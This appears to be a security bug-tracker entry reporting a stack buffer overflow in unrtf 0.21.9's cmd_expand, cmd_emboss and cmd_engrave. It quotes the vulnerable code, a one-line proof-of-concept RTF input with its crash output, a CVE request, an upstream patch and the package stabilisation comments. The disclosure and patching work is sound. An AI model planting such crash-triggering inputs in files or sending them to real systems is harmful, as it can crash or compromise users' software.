From $URL: A stack-based buffer overflow in unrtf 0.21.9 has been found, which affects three functions including: cmd_expand, cmd_emboss and cmd_engrave. # convert.c static int cmd_expand (Word *w, int align, char has_param, int param) { char str[10]; if (has_param) { sprintf(str, "%d", param/4); // Overflow, 9-digit negative value triggers the bug if (!param) attr_pop(ATTR_EXPAND); else attr_push(ATTR_EXPAND, str); } return FALSE; } Apparently writing a negative integer to the buffer can trigger the overflow (Minus sign needs an extra byte). * How to trigger the bug * $ echo "\expnd-400000000" > poc $ unrtf poc <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <!-- Translation from RTF performed by UnRTF, version 0.21.9 --> *** buffer overflow detected ***: unrtf terminated ======= Backtrace: ========= /lib/i386-linux-gnu/libc.so.6(+0x6737a)[0xb764f37a] /lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xb76dfe07] /lib/i386-linux-gnu/libc.so.6(+0xf60a8)[0xb76de0a8] /lib/i386-linux-gnu/libc.so.6(+0xf58b8)[0xb76dd8b8] /lib/i386-linux-gnu/libc.so.6(_IO_default_xsputn+0xa6)[0xb7653bf6] /lib/i386-linux-gnu/libc.so.6(_IO_vfprintf+0xf66)[0xb762b1d6] /lib/i386-linux-gnu/libc.so.6(__vsprintf_chk+0x90)[0xb76dd950] /lib/i386-linux-gnu/libc.so.6(__sprintf_chk+0x20)[0xb76dd8a0] unrtf[0x804c7b8] unrtf[0x804f77d] unrtf[0x804f9e7] unrtf[0x804920b] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7600276] unrtf[0x804953c] ======= Memory map: ======== 08048000-0805b000 r-xp 00000000 08:01 405354 /usr/bin/unrtf 0805b000-0805c000 r--p 00012000 08:01 405354 /usr/bin/unrtf 0805c000-0805d000 rw-p 00013000 08:01 405354 /usr/bin/unrtf 0805d000-08085000 rw-p 00000000 00:00 0 0952d000-0954e000 rw-p 00000000 00:00 0 [heap] b75ca000-b75e6000 r-xp 00000000 08:01 393233 /usr/lib/i386-linux-gnu/libgcc_s.so.1 b75e6000-b75e7000 r--p 0001b000 08:01 393233 /usr/lib/i386-linux-gnu/libgcc_s.so.1 b75e7000-b75e8000 rw-p 0001c000 08:01 393233 /usr/lib/i386-linux-gnu/libgcc_s.so.1 b75e8000-b7799000 r-xp 00000000 08:01 395818 /usr/lib/i386-linux-gnu/libc-2.24.so b7799000-b779b000 r--p 001b0000 08:01 395818 /usr/lib/i386-linux-gnu/libc-2.24.so b779b000-b779c000 rw-p 001b2000 08:01 395818 /usr/lib/i386-linux-gnu/libc-2.24.so b779c000-b779f000 rw-p 00000000 00:00 0 b77a3000-b77a6000 rw-p 00000000 00:00 0 b77a6000-b77a8000 r--p 00000000 00:00 0 [vvar] b77a8000-b77aa000 r-xp 00000000 00:00 0 [vdso] b77aa000-b77cc000 r-xp 00000000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so b77cc000-b77cd000 rw-p 00000000 00:00 0 b77cd000-b77ce000 r--p 00022000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so b77ce000-b77cf000 rw-p 00023000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so bf992000-bf9b3000 rw-p 00000000 00:00 0 [stack] Aborted * Test environment * Linux debian 4.7.0-1-686-pae #1 SMP Debian 4.7.8-1 (2016-10-19) i686 GNU/Linux libc6 2.24-8
CVE-Request: http://openwall.com/lists/oss-security/2017/01/01/1 Upstream patch: http://hg.savannah.gnu.org/hgweb/unrtf/rev/3b16893a6406
@arches, please stabilize.
amd64 stable
x86 stable
ia64 stable
ppc stable
ppc64 stable
arm stable
alpha stable
sparc stable
hppa stable
Arches and Maintainer(s), Thank you for your work. GLSA Vote: No Thank you all for you work. Closing as [noglsa].